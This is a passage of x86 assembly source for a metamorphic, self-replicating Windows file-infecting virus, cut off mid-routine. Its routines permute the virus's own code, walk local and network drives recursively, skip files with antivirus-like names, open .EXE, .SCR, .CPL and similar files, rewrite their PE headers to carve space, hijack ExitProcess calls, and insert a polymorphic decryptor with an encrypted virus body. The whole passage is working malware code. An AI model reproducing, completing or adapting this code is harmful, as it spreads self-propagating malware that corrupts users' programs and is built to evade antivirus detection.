mov eax, [ebp+_BUFFER2_SECTION]
add eax, ebp
mov [ebp+FindFileData], eax
mov eax, [ebp+_BUFFER1_SECTION]
add eax, ebp
mov [ebp+OtherBuffers], eax
call InfectFiles
@@Error:
ret
Main endp
;----------------------------------------------------------------------------------------
IdentifyVariables proc
mov esi, [ebp+InstructionTable]
mov edi, [ebp+VariableTable]
xor eax, eax
mov [ebp+NumberOfVariables], eax
@@LoopGetVar:
xor eax, eax
mov al, [esi]
cmp eax, 0FCh
jz @@NextInstruction
call CheckIfInstructionUsesMem
or eax, eax
jz @@NextInstruction
mov al, [esi+1]
cmp eax, ecx
jz @@DeltaOffsetAt1
mov al, [esi+2]
cmp eax, ecx
jz @@DeltaOffsetAt2
@@NextInstruction:
add esi, 10h
cmp esi, [ebp+AddressOfLastInstruction]
jnz @@LoopGetVar
jmp @@SelectNewVariables
@@DeltaOffsetAt1:
mov al, [esi+2]
jmp @@Continue_01
@@DeltaOffsetAt2:
mov al, [esi+1]
@@Continue_01:
cmp eax, 8
jnz @@NextInstruction
mov eax, [esi+3]
mov edx, [ebp+VariableTable]
mov ebx, [ebp+NumberOfVariables]
sub eax, [ebp+_DATA_SECTION]
and eax, 0FFFFFFF8h
@@LookForVariable:
or ebx, ebx
jz @@InsertVariable
cmp eax, [edx]
jz @@VariableExists
add edx, 4
sub ebx, 4
jmp @@LookForVariable
@@InsertVariable:
mov [edx], eax
mov eax, [ebp+NumberOfVariables]
add eax, 4
mov [ebp+NumberOfVariables], eax
@@VariableExists:
mov eax, 00000809h
mov [esi+1], eax
mov [esi+3], edx
jmp @@NextInstruction
@@SelectNewVariables:
mov ecx, 20000h / 4
mov edi, [ebp+VarMarksTable]
xor eax, eax
@@LoopInitializeMarks:
mov [edi], eax
add edi, 4
sub ecx, 1
or ecx, ecx
jnz @@LoopInitializeMarks
mov ecx, [ebp+NumberOfVariables]
mov ebx, [ebp+VariableTable]
@@LoopGetNewVar:
call Random
and eax, 01FFF8h
add eax, [ebp+VarMarksTable]
mov edx, [eax]
or edx, edx
jnz @@LoopGetNewVar
mov edx, 1
mov [eax], edx
sub eax, [ebp+VarMarksTable]
push ebx
mov ebx, eax
call Random
and eax, 3
add eax, ebx
pop ebx
mov [ebx], eax
add ebx, 4
sub ecx, 4
or ecx, ecx
jnz @@LoopGetNewVar
ret
IdentifyVariables endp
;----------------------------------------------------------------------------------------
PermutateCode proc
xor eax, eax
mov [ebp+NumberOfJumps], eax
mov edi, [ebp+FramesTable]
mov ecx, [ebp+AddressOfLastInstruction]
mov eax, [ebp+InstructionTable]
mov esi, eax
sub ecx, eax
@@NextFrame:
call Random
and eax, 0F0h
cmp eax, 050h
jb @@NextFrame
add eax, 0F0h
mov [edi], esi
add esi, eax
mov [edi+4], esi
mov ebx, esi
@@LoopCheckInst00:
sub ebx, 10h
cmp ebx, [edi]
jz @@CheckInst_Next00
mov edx, [ebx]
and edx, 0FFh
cmp edx, 0FFh
jz @@LoopCheckInst00
cmp edx, 0EAh
jnz @@CheckInst_Next00
@@LoopCheckInst01:
add ebx, 10h
cmp ebx, [ebp+AddressOfLastInstruction]
jz @@CheckInst_Next00
mov edx, [ebx]
and edx, 0FFh
cmp edx, 0FFh
jz @@LoopCheckInst01
cmp edx, 0F6h
jnz @@CheckInst_Next00
add ebx, 10h
sub ebx, esi
add eax, ebx
add esi, ebx
mov [edi+4], esi
@@CheckInst_Next00:
mov ebx, esi
jmp @@DontAdd10hYet
@@LoopCheckInst02:
add ebx, 10h
@@DontAdd10hYet:
cmp ebx, [ebp+AddressOfLastInstruction]
jz @@CheckInst_Next01
mov edx, [ebx]
and edx, 0FFh
cmp edx, 0FFh
jz @@LoopCheckInst02
cmp edx, 0E9h
jz @@CheckInst_IncludeInstruction
cmp edx, 0FEh
jz @@CheckInst_IncludeInstruction
cmp edx, 0EBh
jz @@CheckInst_IncludeInstruction
cmp edx, 0EDh
jz @@CheckInst_IncludeInstruction
cmp edx, 70h
jb @@CheckInst_Next01
cmp edx, 7Fh
ja @@CheckInst_Next01
@@CheckInst_IncludeInstruction:
add ebx, 10h
push ebx
sub ebx, esi
add eax, ebx
add esi, ebx
mov [edi+4], esi
pop ebx
jmp @@DontAdd10hYet
@@CheckInst_Next01:
add edi, 8
sub ecx, eax
cmp ecx, 01E0h
jae @@NextFrame
or ecx, ecx
jz @@FramesCreationFinished
mov [edi], esi
add esi, ecx
mov [edi+4], esi
add edi, 8
@@FramesCreationFinished:
mov [ebp+AddressOfLastFrame], edi
@@TempLabel:
mov eax, edi
mov ebx, [ebp+FramesTable]
sub eax, ebx
mov ebx, 8
@@LoopCalculateMOD:
shl ebx, 1
cmp ebx, eax
jb @@LoopCalculateMOD
sub ebx, 8
mov [ebp+MODValue], ebx
mov esi, [ebp+FramesTable]
mov [ebp+PositionOfFirstInstruction], esi
mov edx, esi
@@LoopExchange:
call Random
mov ebx, [ebp+MODValue]
and eax, ebx
add eax, esi
; ; Uncommenting this instruction the engine doesn't permutate anything
; mov eax, edx
cmp eax, edi
jae @@LoopExchange
mov ecx, [eax]
mov ebx, [edx]
mov [eax], ebx
mov [edx], ecx
cmp edx, [ebp+PositionOfFirstInstruction]
jnz @@LookEAX
mov [ebp+PositionOfFirstInstruction], eax
jmp @@ExchangeNext
@@LookEAX:
cmp eax, [ebp+PositionOfFirstInstruction]
jnz @@ExchangeNext
mov [ebp+PositionOfFirstInstruction], edx
@@ExchangeNext:
add eax, 4
add edx, 4
mov ecx, [eax]
mov ebx, [edx]
mov [eax], ebx
mov [edx], ecx
add edx, 4
cmp edx, edi
jb @@LoopExchange
mov esi, [ebp+InstructionTable]
mov edi, [ebp+PermutationResult]
mov ebx, [ebp+FramesTable]
mov eax, [ebp+PositionOfFirstInstruction]
cmp ebx, eax
jnz @@InsertJump2
@@LoopCopyFrame:
mov eax, 0FFh
mov [ebp+Permut_LastInstruction], eax
mov edx, [ebx]
add ebx, 4
mov ecx, [ebx]
add ebx, 4
@@LoopCopyInstructions:
mov eax, [edx]
cmp al, 4Fh
jnz @@NextInstruction
mov al, 51h
mov [edx], eax
push eax
push ebx
mov ebx, [edx+7]
mov eax, 59h
mov [ebx], al
pop ebx
pop eax
@@NextInstruction:
mov [edi], eax
mov eax, [edx+4]
mov [edi+4], eax
mov eax, [edx+8]
mov [edi+8], eax
mov [edi+0Ch], edx
mov [edx+0Ch], edi
mov eax, [edi]
and eax, 0FFh
cmp eax, 0FFh
jz @@NextInstruction2
@@SetLastInstruction:
mov [ebp+Permut_LastInstruction], eax
jmp @@NextInstruction3
@@NextInstruction2:
mov eax, [edi+0Bh]
and eax, 0FFh
or eax, eax
jnz @@SetLastInstruction
@@NextInstruction3:
add edi, 10h
add edx, 10h
cmp edx, ecx
jnz @@LoopCopyInstructions
mov eax, [ebp+AddressOfLastFrame]
cmp ebx, eax
jae @@LastFrameArrived
mov eax, [ebx]
cmp eax, edx
jz @@LoopTestIfLastFrame
@@LastFrameArrived:
mov eax, [ebp+Permut_LastInstruction]
cmp eax, 0E9h
jz @@LoopTestIfLastFrame
cmp eax, 0EBh
jz @@LoopTestIfLastFrame
cmp eax, 0EDh
jz @@LoopTestIfLastFrame
cmp eax, 0FEh
jz @@LoopTestIfLastFrame
mov [edi+1], edx
@@InsertJump:
mov eax, 0E9h
mov [edi], al
call InsertJumpInTable
add edi, 10h
@@LoopTestIfLastFrame:
mov eax, [ebp+AddressOfLastFrame]
cmp ebx, eax
jae @@End
jmp @@LoopCopyFrame
@@InsertJump2:
mov eax, [eax]
mov [edi+1], eax
jmp @@InsertJump
@@End: mov [ebp+AddressOfLastInstruction], edi
mov ecx, [ebp+NumberOfLabels]
mov edx, [ebp+LabelTable]
@@LoopUpdateLabel:
mov eax, [edx+4]
mov ebx, [eax+0Ch]
mov [edx], ebx
add edx, 8
sub ecx, 1
or ecx, ecx
jnz @@LoopUpdateLabel
mov ecx, [ebp+NumberOfJumps]
mov ebx, [ebp+JumpsTable]
jmp @@CheckNumberOfJumps
@@LoopUpdateJumps:
mov esi, [ebx]
mov eax, [esi+1]
mov edi, [eax+0Ch]
mov [edx], edi
mov [edx+4], eax
mov [esi+1], edx
mov eax, [ebp+NumberOfLabels]
add eax, 1
mov [ebp+NumberOfLabels], eax
add edx, 8
add ebx, 4
sub ecx, 4
@@CheckNumberOfJumps:
or ecx, ecx
jnz @@LoopUpdateJumps
ret
PermutateCode endp
Random proc
push edx
push ecx
mov eax, [ebp+RndSeed1]
mov ecx, [ebp+RndSeed2]
add eax, ecx
call RandomMod1
xor eax, [ebp+RndSeed1]
mov [ebp+RndSeed1], eax
mov ecx, eax
mov eax, [ebp+RndSeed2]
add [ebp+RndSeed2], ecx
call RandomMod2
xor eax, [ebp+RndSeed2]
mov [ebp+RndSeed2], eax
xor eax, [ebp+RndSeed1]
call RandomMod2
pop ecx
pop edx
ret
Random endp
RandomMod1 proc
mov edx, eax
and edx, 1FFFh
shl edx, 13h
and eax, 0FFFFFE00h
shr eax, 0Dh
or eax, edx
add eax, ecx
ret
RandomMod1 endp
RandomMod2 proc
mov edx, eax
and edx, 1FFFFh
shl edx, 0Fh
and eax, 0FFFFE000h
shr eax, 11h
or eax, edx
add eax, ecx
ret
RandomMod2 endp
InsertJumpInTable proc
mov ecx, [ebp+NumberOfJumps]
mov edx, [ebp+JumpsTable]
add edx, ecx
mov [edx], edi
add ecx, 4
mov [ebp+NumberOfJumps], ecx
ret
InsertJumpInTable endp
;----------------------------------------------------------------------------------------
InfectFiles proc
call Random
and eax, 3
jnz @@DontLoop
@@LoopAgain:
call Random
and eax, 0FFh
jnz @@LoopAgain
@@DontLoop:
xor eax, eax
mov [ebp+DirectoryDeepness], eax
call InfectFiles2
mov ebx, [ebp+FindFileData]
add ebx, 1000h
@@LoopGetDrives:
xor eax, eax
mov [ebp+DirectoryDeepness], eax
push eax
push ecx
push edx
mov eax, [ebp+FindFileData]
add eax, 1000h
push eax
mov eax, 200h
push eax
call dword ptr [ebp+RVA_GetLogicalDriveStringsA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
or eax, eax
jz @@Error2
push eax
push ecx
push edx
mov eax, ebx
push eax
call dword ptr [ebp+RVA_GetDriveTypeA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
cmp eax, 3
jz @@InfectDrive
cmp eax, 4
jnz @@NextDrive
cmp eax, 6
@@InfectDrive:
push eax
push ecx
push edx
mov eax, ebx
push eax
call dword ptr [ebp+RVA_SetCurrentDirectoryA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
or eax, eax
jz @@Error2
push ebx
call InfectFiles2
pop ebx
@@NextDrive:
@@LoopFindNull:
add ebx, 1
mov eax, [ebx]
and eax, 0FFh
or eax, eax
jnz @@LoopFindNull
add ebx, 1
mov eax, [ebx]
and eax, 0FFh
or eax, eax
jnz @@LoopGetDrives
@@Error2:
ret
InfectFiles endp
InfectFiles2 proc
push eax
push ecx
push edx
mov eax, [ebp+FindFileData]
push eax
mov edx, [ebp+OtherBuffers]
push edx
mov eax, '*.*'
mov [edx], eax
call dword ptr [ebp+RVA_FindFirstFileA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
cmp eax, -1
jz @@Error
mov [ebp+hFindFile], eax
@@TouchAgain:
mov edx, [ebp+FindFileData]
mov eax, [edx]
and eax, 10h
or eax, eax
jz @@TryToInfectFile
mov eax, [ebp+DirectoryDeepness]
cmp eax, 5
jz @@InfectNextFile
mov eax, [edx+2Ch]
and eax, 0FFFFFFh
cmp eax, '..'
jz @@InfectNextFile
and eax, 0FFFFh
cmp eax, '.'
jz @@InfectNextFile
and eax, 01Fh
cmp eax, 'W' AND 1Fh
jz @@InfectNextFile
push eax
push ecx
push edx
mov eax, edx
add eax, 2Ch
push eax
call dword ptr [ebp+RVA_SetCurrentDirectoryA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
or eax, eax
jz @@InfectNextFile
mov eax, [ebp+DirectoryDeepness]
add eax, 1
mov [ebp+DirectoryDeepness], eax
mov eax, [ebp+hFindFile]
push eax
call InfectFiles2
pop eax
mov [ebp+hFindFile], eax
mov eax, [ebp+DirectoryDeepness]
sub eax, 1
mov [ebp+DirectoryDeepness], eax
mov edx, [ebp+FindFileData]
mov eax, '..'
mov [edx], eax
push eax
push ecx
push edx
mov eax, edx
push eax
call dword ptr [ebp+RVA_SetCurrentDirectoryA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
or eax, eax
jz @@Error2
jmp @@InfectNextFile
@@TryToInfectFile:
xor eax, eax
mov eax, 3
call Random
and eax, 1
jnz @@InfectNextFile
mov edx, [ebp+FindFileData]
add edx, 2Ch
mov eax, [edx]
and eax, 1F1F1F1Fh
cmp eax, 'itna' AND 1F1F1F1Fh
jz @@InfectNextFile
mov eax, [edx]
and eax, 1F1Fh
cmp eax, '-F' AND 1F1Fh
jz @@InfectNextFile
cmp eax, 'AP' AND 1F1Fh
jz @@InfectNextFile
cmp eax, 'CS' AND 1F1Fh
jz @@InfectNextFile
cmp eax, 'RD' AND 1F1Fh
jz @@InfectNextFile
cmp eax, 'ON' AND 1F1Fh
jz @@InfectNextFile
cmp eax, 'EI' AND 1F1Fh
jz @@InfectNextFile
cmp eax, 'XE' AND 1F1Fh
jz @@InfectNextFile
cmp eax, 'OW' AND 1F1Fh
jz @@InfectNextFile
mov ebx, edx
@@LoopFindExtension:
mov eax, [ebx]
and eax, 01Fh
cmp eax, 'V' AND 1Fh
jz @@InfectNextFile
cmp eax, '0' AND 1Fh
or eax, eax
jz @@CheckExtension
add ebx, 1
jmp @@LoopFindExtension
@@CheckExtension:
mov eax, [ebx-4]
and eax, 1F1F1FFFh
cmp eax, 'EXE.' AND 1F1F1FFFh
jz @@InfectFile
cmp eax, 'RCS.' AND 1F1F1FFFh
jz @@InfectFile
cmp eax, 'TAD.' AND 1F1F1FFFh
jz @@InfectFile
cmp eax, 'LVO.' AND 1F1F1FFFh
jz @@InfectFile
cmp eax, 'LPC.' AND 1F1F1FFFh
jnz @@InfectNextFile
@@InfectFile:
call TouchFile
@@InfectNextFile:
push eax
push ecx
push edx
mov eax, [ebp+FindFileData]
push eax
mov eax, [ebp+hFindFile]
push eax
call dword ptr [ebp+RVA_FindNextFileA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
or eax, eax
jnz @@TouchAgain
@@Error2:
push eax
push ecx
push edx
mov eax, [ebp+hFindFile]
push eax
call dword ptr [ebp+RVA_FindClose]
pop edx
pop ecx
pop eax
@@Error:
ret
InfectFiles2 endp
PrepareFile proc
mov eax, [ebp+MappingAddress]
mov ebx, [eax]
and ebx, 0FFFFh
cmp ebx, 0+'ZM'
jnz @@Error
mov ebx, [eax+18h]
and ebx, 0FFh
cmp ebx, 40h
jnz @@Error
mov ebx, [eax+3Ch]
add ebx, eax
mov ecx, [ebx]
cmp ecx, 0+'EP'
jnz @@Error
mov [ebp+HeaderAddress], ebx
mov ecx, [ebx+58h]
or ecx, ecx
jnz @@Error
mov ecx, [ebx+4]
and ecx, 0FFFFh
cmp ecx, 014Ch
jz @@IA32
@@IA32: mov ecx, [ebx+6]
and ecx, 0FFFFh
mov edx, [ebx+14h]
and edx, 0FFFFh
add edx, 18h
add edx, ebx
mov [ebp+StartOfSectionHeaders], edx
xor eax, eax
mov [ebp+RelocHeader], eax
mov [ebp+TextHeader], eax
mov [ebp+DataHeader], eax
@@LoopSections:
mov eax, [edx]
mov esi, [edx+4]
cmp eax, 'ler.'
jnz @@LookForCode
cmp esi, 0+'co'
jnz @@NextSection
mov [ebp+RelocHeader], edx
jmp @@NextSection
@@LookForCode:
cmp eax, 'xet.'
jnz @@LookForCode2
cmp esi, 0+'t'
jnz @@NextSection
mov [ebp+TextHeader], edx
jmp @@NextSection
@@LookForCode2:
cmp eax, 'EDOC'
jnz @@LookForData
or esi, esi
jnz @@NextSection
mov [ebp+TextHeader], edx
jmp @@NextSection
@@LookForData:
cmp eax, 'tad.'
jnz @@LookForData2
cmp esi, 0+'a'
jnz @@NextSection
mov [ebp+DataHeader], edx
jmp @@NextSection
@@LookForData2:
cmp eax, 'ATAD'
jnz @@LookForData3
or esi, esi
jnz @@NextSection
mov [ebp+DataHeader], edx
jmp @@NextSection
@@LookForData3:
@@NextSection:
mov [ebp+LastHeader], edx
add edx, 28h
dec ecx
or ecx, ecx
jnz @@LoopSections
xor eax, eax
mov [ebp+ExitProcessAddress], eax
mov [ebp+VirtualAllocAddress], eax
mov [ebp+GetProcAddressAddress], eax
mov [ebp+GetModuleHandleAddress], eax
mov eax, [ebp+TextHeader]
or eax, eax
jz @@Error
mov eax, [ebp+DataHeader]
or eax, eax
jz @@Error
mov eax, [ebp+RelocHeader]
or eax, eax
jz @@NoRelocs
mov eax, 3
call Random
and eax, 3
jz @@NoRelocs2
mov eax, [ebp+RelocHeader]
cmp eax, [ebp+LastHeader]
jnz @@Error
mov eax, 1
mov [ebp+MakingFirstHole], eax
mov esi, [ebp+TextHeader]
mov ecx, 2000h
call UpdateHeaders
mov [ebp+RVA_TextHole], edi
mov [ebp+Phys_TextHole], eax
mov [ebp+TextHoleSize], ecx
mov eax, [ebp+ExitProcessAddress]
or eax, eax
jz @@Error
mov eax, [ebp+GetProcAddressAddress]
or eax, eax
jz @@Error
mov eax, [ebp+GetModuleHandleAddress]
or eax, eax
jz @@Error
mov ebx, [ebp+HeaderAddress]
add [ebx+1Ch], ecx
add [ebp+FileSize], ecx
xor eax, eax
mov [ebp+MakingFirstHole], eax
mov esi, [ebp+DataHeader]
mov ecx, [ebp+RoundedSizeOfNewCode]
call UpdateHeaders
mov [ebp+RVA_DataHole], edi
mov [ebp+Phys_DataHole], eax
mov ebx, [ebp+HeaderAddress]
mov eax, [ebp+ExitProcessAddress]
add eax, [ebx+34h]
mov [ebp+ExitProcessAddress], eax
mov eax, [ebp+GetProcAddressAddress]
add eax, [ebx+34h]
mov [ebp+GetProcAddressAddress], eax
mov eax, [ebp+GetModuleHandleAddress]
add eax, [ebx+34h]
mov [ebp+GetModuleHandleAddress], eax
mov eax, [ebp+VirtualAllocAddress]
or eax, eax
jz @@DontAddBaseAddress
add eax, [ebp+34h]
mov [ebp+VirtualAllocAddress], eax
@@DontAddBaseAddress:
add [ebx+20h], ecx
add [ebp+FileSize], ecx
mov esi, [ebp+RelocHeader]
mov eax, [esi+0Ch]
mov [ebx+50h], eax
mov edi, [esi+14h]
mov ecx, [ebp+FileSize]
sub ecx, edi
mov [ebp+FileSize], edi
add edi, [ebp+MappingAddress]
xor eax, eax
@@Loop0: call Random
and eax, 0FCh
mov [edi], eax
add edi, 4
sub ecx, 4
or ecx, ecx
jnz @@Loop0
xor eax, eax
mov ecx, 28h
@@Loop1: mov [esi], eax
add esi, 4
sub ecx, 4
or ecx, ecx
jnz @@Loop1
mov [ebx+0A0h], eax
mov [ebx+0A4h], eax
mov eax, [ebx+06h]
sub eax, 1
mov [ebx+06h], eax
mov eax, [ebx+16h]
or eax, 1
mov [ebx+16h], eax
mov eax, 2000h
mov [ebp+MaxSizeOfDecryptor], eax
xor eax, eax
ret
@@Error:
mov eax, 1
ret
@@NoRelocs2:
xor eax, eax
mov [ebp+RelocHeader], eax
@@NoRelocs:
xor ecx, ecx
mov edx, -1
call UpdateImports
mov ecx, [ebp+HeaderAddress]
mov eax, [ebp+ExitProcessAddress]
or eax, eax
jz @@Error
add eax, [ecx+34h]
mov [ebp+ExitProcessAddress], eax
mov eax, [ebp+GetProcAddressAddress]
or eax, eax
jz @@Error
add eax, [ecx+34h]
mov [ebp+GetProcAddressAddress], eax
mov eax, [ebp+GetModuleHandleAddress]
or eax, eax
jz @@Error
add eax, [ecx+34h]
mov [ebp+GetModuleHandleAddress], eax
mov eax, [ebp+VirtualAllocAddress]
or eax, eax
jz @@NoVirtualAlloc
add eax, [ecx+34h]
mov [ebp+VirtualAllocAddress], eax
@@NoVirtualAlloc:
xor eax, eax
call Random
and eax, 07h
jz @@HoleAtLastSection
mov ebx, [ebp+TextHeader]
mov eax, [ebx+10h]
cmp eax, [ebx+08h]
jae @@CheckPaddingSpace
add eax, [ebx+14h]
mov [ebp+Phys_TextHole], eax
mov eax, [ebx+10h]
add eax, [ebx+0Ch]
mov [ebp+RVA_TextHole], eax
mov eax, [ebx+08h]
sub eax, [ebx+10h]
cmp eax, 600h
jb @@HoleAtLastSection
cmp eax, 80000000h
ja @@Error
cmp eax, 2000h
jbe @@TextHoleSizeOK
mov eax, 2000h
@@TextHoleSizeOK:
mov [ebp+MaxSizeOfDecryptor], eax
mov edx, ebx
mov ecx, [ebp+LastHeader]
@@LoopAddPhysicalSize:
cmp edx, ebx
jz @@NextAddPhysicalSize
add [edx+14h], eax
@@NextAddPhysicalSize:
cmp edx, ecx
jz @@EndAddPhysicalSize
add edx, 28h
jmp @@LoopAddPhysicalSize
@@EndAddPhysicalSize:
mov edx, [ebp+MappingAddress]
mov edi, edx
add edx, [ebx+14h]
add edx, [ebx+10h]
add edi, [ebp+FileSize]
mov esi, edi
add edi, eax
add [ebx+10h], eax
mov eax, 2000h
add [ebp+FileSize], eax
@@LoopMakePhysicalHole:
call Random
and eax, 0FCh
sub edi, 4
sub esi, 4
mov eax, [esi]
mov [edi], eax
cmp edi, edx
jnz @@LoopMakePhysicalHole
jmp @@TextHoleMade
@@HoleAtLastSection:
mov ebx, [ebp+LastHeader]
mov eax, [ebx+08h]
add eax, [ebx+0Ch]
mov [ebp+RVA_TextHole], eax
mov eax, [ebx+08h]
add eax, [ebx+14h]
mov [ebp+Phys_TextHole], eax
mov eax, 2000h
mov [ebp+MaxSizeOfDecryptor], eax
add [ebx+08h], eax
add [ebx+10h], eax
add [ebp+FileSize], eax
mov eax, [ebx+24h]
and eax, 0FDFFFFFFh
mov [ebx+24h], eax
jmp @@GetDataHole
@@CheckPaddingSpace:
mov eax, [ebx+08h]
add eax, [ebx+0Ch]
mov [ebp+RVA_TextHole], eax
mov eax, [ebx+08h]
add eax, [ebx+14h]
mov [ebp+Phys_TextHole], eax
mov eax, [ebx+10h]
sub eax, [ebx+08h]
mov [ebp+MaxSizeOfDecryptor], eax
cmp eax, 400h
jb @@HoleAtLastSection
mov ecx, eax
mov eax, [ebx+10h]
add eax, [ebx+0Ch]
cmp eax, [ebx+28h+0Ch]
ja @@Error
add [ebx+08h], ecx
@@TextHoleMade:
mov ecx, [ebp+MaxSizeOfDecryptor]
mov edi, [ebp+Phys_TextHole]
add edi, [ebp+MappingAddress]
xor eax, eax
and ecx, 0FFFFFFFCh
@@LoopFillHole:
call Random
and eax, 0FCh
mov [edi], eax
add edi, 4
sub ecx, 4
or ecx, ecx
jnz @@LoopFillHole
mov eax, [ebx+08h]
mov esi, [ebp+HeaderAddress]
mov [esi+1Ch], eax
@@GetDataHole:
mov ebx, [ebp+LastHeader]
mov eax, [ebp+RoundedSizeOfNewCode]
add [ebp+FileSize], eax
mov ecx, [ebx+24h]
and ecx, 80000000h
or ecx, ecx
jnz @@Error
mov ecx, [ebx+10h]
add ecx, [ebx+14h]
mov [ebp+Phys_DataHole], ecx
mov ecx, [ebx+10h]
add ecx, [ebx+0Ch]
mov [ebp+RVA_DataHole], ecx
add eax, [ebx+10h]
mov [ebx+10h], eax
mov [ebx+08h], eax
@@AllHolesPrepared:
mov esi, [ebp+HeaderAddress]
mov eax, [ebx+0Ch]
add eax, [ebx+08h]
mov [esi+50h], eax
mov edx, [ebp+ExitProcessAddress]
mov ebx, [ebp+TextHeader]
mov esi, [ebx+14h]
add esi, [ebp+MappingAddress]
mov ecx, [ebx+10h]
sub ecx, 6
@@LoopFindExitProcess:
mov eax, [esi]
and eax, 0FFh
cmp eax, 0FFh
jnz @@NextInstruction
mov eax, [esi+1]
and eax, 0FFh
cmp eax, 25h
jz @@JMPMemFound
cmp eax, 15h
jnz @@NextInstruction
@@JMPMemFound:
mov eax, [esi+2]
cmp eax, edx
jnz @@NextInstruction
add esi, 2
push edx
mov edx, [ebp+HeaderAddress]
mov edx, [edx+34h]
add edx, [ebp+RVA_TextHole]
call PatchExitProcess
pop edx
add esi, 4
@@NextInstruction:
add esi, 1
sub ecx, 1
or ecx, ecx
jnz @@LoopFindExitProcess
xor eax, eax
ret
PrepareFile endp
TouchFile proc
mov [ebp+Addr_FilePath], edx
push eax
push ecx
push edx
push edx
call dword ptr [ebp+RVA_GetFileAttributesA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
cmp eax, -1
jz @@Error_
mov [ebp+FileAttributes], eax
push eax
push ecx
push edx
push 80h
mov eax, [ebp+Addr_FilePath]
push eax
call dword ptr [ebp+RVA_SetFileAttributesA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
or eax, eax
jz @@Error_
push eax
push ecx
push edx
push 0
push 0
push 3
push 0
push 0
push 0C0000000h
push edx
call dword ptr [ebp+RVA_CreateFileA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
cmp eax, -1
jz @@Error
mov [ebp+hFile], eax
push eax
push ecx
push edx
push 0
push eax
call dword ptr [ebp+RVA_GetFileSize]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
or eax, eax
jz @@Error2
mov [ebp+FileSize], eax
mov [ebp+OriginalFileSize], eax
push eax
push ecx
push edx
push 0
add eax, [ebp+RoundedSizeOfNewCode]
add eax, 2000h
push eax
push 0
push 4
push 0
mov eax, [ebp+hFile]
push eax
call dword ptr [ebp+RVA_CreateFileMappingA]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
or eax, eax
jz @@Error2
mov [ebp+hMapping], eax
push eax
push ecx
push edx
push 0
push 0
push 0
push 0F001Fh
push eax
call dword ptr [ebp+RVA_MapViewOfFile]
mov [ebp+ReturnValue], eax
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
or eax, eax
jz @@Error3
mov dword ptr [ebp+MappingAddress], eax
xor eax, eax
mov [ebp+NumberOfUndoActions], eax
call PrepareFile
or eax, eax
jnz @@Error4
mov ebx, [ebp+MappingAddress]
add ebx, [ebp+Phys_TextHole]
mov ecx, [ebp+MaxSizeOfDecryptor]
cmp ecx, 600h
jbe @@SetSizeOfExpansionTo0
mov eax, 1
call Random
and eax, 1
jz @@SetSizeOfExpansionTo0
mov eax, -1
jmp @@SetSizeOfExpansion
@@SetSizeOfExpansionTo0:
mov eax, 2
call Random
and eax, 1
jz @@SetSizeOfExpansionTo1
xor eax, eax
jmp @@SetSizeOfExpansion
@@SetSizeOfExpansionTo1:
mov eax, 1
@@SetSizeOfExpansion:
mov [ebp+SizeOfExpansion], eax
@@CheckWithOtherSizeOfExpansion:
mov ecx, 9
@@GenerateOther:
push ecx
mov edi, [ebp+DecryptorPseudoCode]
mov eax, [ebp+VirtualAllocAddress]
push eax
call MakeDecryptor
pop eax
mov [ebp+VirtualAllocAddress], eax
pop ecx
sub ecx, 1
mov eax, [ebp+SizeOfDecryptor]
cmp eax, [ebp+MaxSizeOfDecryptor]
jbe @@SizeOfDecryptorOK
or ecx, ecx
jnz @@GenerateOther
mov eax, [ebp+SizeOfExpansion]
cmp eax, 2
jz @@InsertExitProcess
add eax, 1
mov [ebp+SizeOfExpansion], eax
jmp @@CheckWithOtherSizeOfExpansion
@@InsertExitProcess:
mov edi, [ebp+Phys_TextHole]
add edi, [ebp+MappingAddress]
mov eax, 6Ah
mov [edi], eax
add edi, 2
mov eax, 15FFh
mov [edi], eax
add edi, 2
mov eax, [ebp+ExitProcessAddress]
mov [edi], eax
jmp @@Exit
@@SizeOfDecryptorOK:
mov esi, [ebp+AssembledDecryptor]
mov edi, [ebp+Phys_TextHole]
add edi, [ebp+MappingAddress]
mov ecx, [ebp+SizeOfDecryptor]
@@LoopCopyDecryptor:
mov eax, [esi]
mov [edi], eax
add esi, 1
add edi, 1
dec ecx
or ecx, ecx
jnz @@LoopCopyDecryptor
mov edx, 30h
mov esi, [ebp+MaxSizeOfDecryptor]
sub esi, [ebp+SizeOfDecryptor]
and esi, 0FFFFFFFCh
or esi, esi
jz @@ContinueWithTheRest
@@CheckAgainThePossibility:
call Random
and eax, 0FCh
or eax, eax
jz @@CheckAgainThePossibility
sub edx, 1
cmp eax, esi
jb @@FillRandomBytes
or edx, edx
jnz @@CheckAgainThePossibility
jmp @@ContinueWithTheRest
@@FillRandomBytes:
mov ecx, eax
@@LoopFillRandomBytes:
call Random
mov [edi], eax
add edi, 4
sub ecx, 4
or ecx, ecx
jnz @@LoopFillRandomBytes
@@ContinueWithTheRest:
mov edi, [ebp+MappingAddress]
add edi, [ebp+Phys_DataHole]
cmp edi, [ebp+MappingAddress]
jz @@Exit
mov edx, [ebp+TypeOfEncryption]
mov ebx, [ebp+EncryptionKey]
mov esi, [ebp+NewAssembledCode]
mov ecx, [ebp+SizeOfNewCode]
and ecx, 0FFFFFFFCh
add ecx, 4
@@LoopEncryptCode:
mov eax, [esi]
or ebx, ebx
jz @@NoEncryption
or edx, edx
jz @@ADDKey
cmp edx, 1
jz @@SUBKey
@@XORKey:
xor eax, ebx
jmp @@StoreDWORD
@@ADDKey:
add eax, ebx
jmp @@StoreDWORD
@@SUBKey:
sub eax, ebx
@@NoEncryption:
@@StoreDWORD:
mov [edi], eax
add esi, 4
add edi, 4
